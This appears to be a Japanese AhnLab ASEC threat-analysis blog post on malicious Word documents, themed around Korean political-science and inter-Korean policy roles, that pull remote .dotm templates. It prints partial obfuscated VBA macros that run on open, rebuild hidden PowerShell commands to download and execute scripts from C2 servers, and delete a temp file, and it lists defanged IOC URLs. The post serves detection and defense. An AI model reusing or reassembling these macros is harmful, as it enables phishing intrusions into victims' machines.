「韓国政治外交学術」および「政策諮問委員経歴」の不正な Word ドキュメントの拡散

ASEC 分析チームでは、以下のように二度にわたり「謝金支給依頼書」、「夏季学術大会略歴作成様式」というタイトルの Word ドキュメントによるマルウェアが拡散していることを紹介した。類似する攻撃方式をモニタリングしていたところ、6月と7月1日に、同じ制作者によって新たな Word ドキュメントが配布された状況を確認した。

新たに捕捉された不正な Word ドキュメントのタイトル

  • 민주평통-한국정치외교사학회 공동 학술 회의 프로그램 (최종본).docx
    (翻訳:民主平統-韓国政治外交史学会共同学術会議プログラム(最終版).docx) 
    – 6月に追加確保
  • [남북회담본부 정책자문위원] 약력 작성 양식.docx
    (翻訳:[南北会談本部政策諮問委員]経歴作成様式.docx)
     – 7月1日に追加確保

過去に同じタイプとして紹介された不正な Word に関するブログの内容

7月1日に確認された配布ファイル名は[남북회담본부 정책자문위원] 약력 작성 양식.docx (翻訳:[南北会談本部政策諮問委員]略歴作成様式.docx)」であり、文書内の External リンクを通じて外部 dotm マクロを含む Word ドキュメントファイルをダウンロードする構造である。

[図1] 「南北会談本部政策諮問委員」経歴作成様式.docx 内部の External アドレス

実際に不正な行為を実行するマクロコードを持っている InterKoreanSummit.dotm ファイルには、以下のような難読化されたコードが存在する。このマクロは、6月11日に公開した正常な Excel/Word ドキュメントに偽装したマルウェアに使用されたマクロと類似した形式を持っている。

Attribute VB_Name = "ThisDocument"
 Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
 Attribute VB_GlobalNameSpace = False
 Attribute VB_Creatable = False
 Attribute VB_PredeclaredId = True
 Attribute VB_Exposed = True
 Attribute VB_TemplateDerived = False
 Attribute VB_Customizable = True
 Private Sub Document_Open()
 eifhhdfasfiedf
 aksjdkjaskf
 End Sub
 Function eifhhdfasfiedf()
 Set djfeihfidkasljf = CreateObject("Shell.Application")
 dfgdfjiejfjdshaj = "tlsiapowtlsiaertlsiastlsiahetlsialltlsia.etlsiatlsiaxtlsiae"
 fjdjkasf = "tlsiajdsladkf"
 fjdjkasf = Left(fjdjkasf, 5)
 dfgdfjiejfjdshaj = Replace(dfgdfjiejfjdshaj, fjdjkasf, "")
 hdfksallasjkdlaf = "$atlsiatlsiatlsia='tlsiaC:tlsiatlsia\wtlsiatlsiaintlsiatlsiadotlsiatlsiawstlsiatlsia\ttlsiaetlsiamptlsia\DtlsiatlsiaMItlsia5tlsiaCtlsiaA0tlsia6.tlsiatlsiatmtlsiaptlsia'tlsiatlsia;tlsia"
 hdfksallasjkdlaf = Replace(hdfksallasjkdlaf, fjdjkasf, "")
...(省略)
 aksfkjaskjfksnkf = "tlsiatlsia$tlsiactlsiatlsia;$tlsiadtlsia=[tlsiatlsiaIOtlsia.tlsiatlsiaFitlsiale]tlsiatlsia:tlsia:RtlsiatlsiaeatlsiadAtlsialtlsiatlsialTtlsiaetlsiaxttlsiatlsia($tlsiaatlsiatlsia)tlsia;tlsia$tlsiae=tlsiaietlsiatlsiax $tlsiad;tlsiaitlsiaetlsiax tlsia$tlsiae"
 aksfkjaskjfksnkf = Replace(aksfkjaskjfksnkf, fjdjkasf, "")
 skdjfksjkfjkdsfj = hdfksallasjkdlaf + ndkflajdkfjskdjfl + salfnxkfdlsjafkj + sjdfkjaslalsfial + aksfkjaskjfksnkf
 djfeihfidkasljf.ShellExecute dfgdfjiejfjdshaj, skdjfksjkfjkdsfj, "", "open", 0
 End Function
 Function aksjdkjaskf()
 Dim SngSec As Single
...(省略)
 sakjfkalsjfkasjf = Replace(sakjfkalsjfkasjf, fjdjkasf, "")
 djfkasjfskaal = Left(sakjfkalsjfkasjf, 32)
 djfkasjfskaal = Right(djfkasjfskaal, 28)
 If djfkasjfskaal = "" Then
 Else
 Kill djfkasjfskaal
 End If
 End Function

[コード1] InterKoreanSummit.dotm ファイル内部のマクロコードの一部

Attribute VB_Name = "NewMacros"
 Sub djfksdalfjkasj()
     Selection.TypeText Text:="a"
 End Sub
 Sub ejdksaljfkalkf()
     Selection.TypeText Text:="b"
 End Sub
 Sub eijdklsafkasdk()
     Selection.TypeText Text:="c"
 End Sub
 Sub uehfsahdkajkas()
     Selection.TypeText Text:="d"
 End Sub
...(省略)
Sub euehfhafjhdjkafqka()
     Selection.TypeText Text:=""     Application.Run MacroName:="Project.NewMacros.euirieafkjekjf"     Application.Run MacroName:="Project.NewMacros.qjiejwfksjalksainuse"     Application.Run MacroName:="Project.NewMacros.euirieafkjekjf"     Selection.TypeText Text:=""
 End Sub
 Sub eijfkdjqjdfklafea()
    Selection.TypeText Text:="+"
 End Sub
 Sub efuehjsahfklkejklafe()
    Selection.TypeText Text:="{"
 End Sub
...(省略)
Sub qeuejsahfdasight()
    Selection.MoveRight Unit:=wdCharacter, Count:=1
 End Sub
 Sub idifdsakjflakdsagedown()
    Selection.MoveDown Unit:=wdScreen, Count:=1
 End Sub

[コード2] InterKoreanSummit.dotm ファイル内部のマクロコードの一部

マクロを実行すると、C2(hxxp://ripzi.getenjoyment.net/le/eh.txt)に接続して追加のスクリプトをダウンロードし、C:\windows\temp\DMI5CA06.tmp ファイルを kill する行為を実行する。ダウンロードされたスクリプトは以下のように6月の「正常な Excel/Word ドキュメントに偽装したマルウェア」で確認されたスクリプトと同じコードであり、C2 アドレスだけが異なる。

[図-2] C2 で確認された不正なスクリプト

また、6月にはこのタイプの不正なファイルが「민주평통-한국정치외교사학회 공동 학술 회의 프로그램 (최종본).docx (翻訳:民主平統-韓国政治外交史学会共同学術会議プログラム(最終版).docx)」という名前で配布されたことを確認した。このファイルの内部に存在する External リンクは、以下の通りである。

[図3] 「民主平統-韓国政治外交史学会共同学術会議プログラム(最終版).docx」内部の External アドレス

このアドレスからダウンロードした Seminarfinal.dotm ファイルには、上記で説明した InterKoreanSummit.dotm ファイルと類似したマクロが存在する。以下は、Seminarfinal.dotm に存在する難読化されたマクロコードの一部である。

Private Sub Document_Open()
 eifhhdfasfiedf
 End Sub
 Function eifhhdfasfiedf()
 Set djfeihfidkasljf = CreateObject("Shell.Application")
 Dim dfgdfjiejfjdshaj As String
 Dim yhjhfjdhfdhfuesk(10) As String
 dfgdfjiejfjdshaj = "tuwhnptuwhnotuwhnwtuwhnetuwhnrtuwhnstuwhnhtuwhnetuwhnltuwhnltuwhn.tuwhnetuwhnxtuwhnetuwhn"
 dfgdfjiejfjdshaj = Replace(dfgdfjiejfjdshaj, "tuwhn", "")
 yhjhfjdhfdhfuesk(0) = "tuwhn[tuwhnstuwhnttuwhnrtuwhnituwhnntuwhngtuwhn]tuwhn$tuwhnatuwhn=tuwhn{tuwhn(tuwhnNtuwhnetuwhnwtuwhn-tuwhnOtuwhnbtuwhnjtuwhnetuwhnctuwhnttuwhn "
 dfjdiafjlij = Replace(yhjhfjdhfdhfuesk(0), "tuwhn", "")
...(省略)
 dfjdiafjlij = dfjdiafjlij & Replace(yhjhfjdhfdhfuesk(4), "tuwhn", "")
 yhjhfjdhfdhfuesk(5) = "etuwhnxtuwhn tuwhn$tuwhnbtuwhn;tuwhnituwhnetuwhnxtuwhn tuwhn$tuwhnctuwhn"
 dfjdiafjlij = dfjdiafjlij & Replace(yhjhfjdhfdhfuesk(5), "tuwhn", "")
 djfeihfidkasljf.ShellExecute dfgdfjiejfjdshaj, dfjdiafjlij, "", "open", 0
 End Function

[[コード3] Seminarfinal.dotm ファイル内部のマクロコードの一部

このマクロも C2(hxxp://likel.atwebpages.com/bu/ma.txt)に接続して追加のスクリプトをダウンロードする。ダウンロードされたスクリプトは、すでに説明した hxxp://ripzi.getenjoyment.net/le/eh.txt に存在するスクリプトと同じである。

これらのファイルは、すべて User 名が Naeil_영문시작‘ (翻訳:Naeil_英文開始)というユーザーから収集された。これは、過去の「[** 夏季学術大会]_経歴書.doc)」と「謝金支給依頼書」の作成者と一致することから、同じ攻撃者によって生成されたファイルと推定される。

[図4] 「[** 夏季学術大会]_経歴書.doc」ドキュメントのプロパティ

最近、このように特定のユーザーをターゲットにしたマルウェアが活発に配布されている。大半が同じ攻撃者により生成されたものと推定され、ユーザーの注意が必要である。出どころが不明なユーザーから送信されたメールに添付されたファイル、およびリンクは開かないようにし、マクロを実行しないようにしなければならない。

AhnLab V3 プロダクトラインでは、このようなターゲット型攻撃の不正な Word ドキュメントを以下のように検知している。

[ファイル検知]

  • Downloader/XML.External
  • Downloader/DOC.Generic

[IOC]

  • hxxp://chels.mypressonline.com/Package/2006/relationships/InterKoreanSummit.dotm
  • hxxp://likel.atwebpages.com/officeDocument/2006/relationships/attachedTemplate/Seminarfinal.dotm
  • hxxp://ripzi.getenjoyment.net/le/eh.txt
  • hxxp://likel.atwebpages.com/bu/ma.txt
5 3 votes
評価する
guest
0 コメント
Inline Feedbacks
View all comments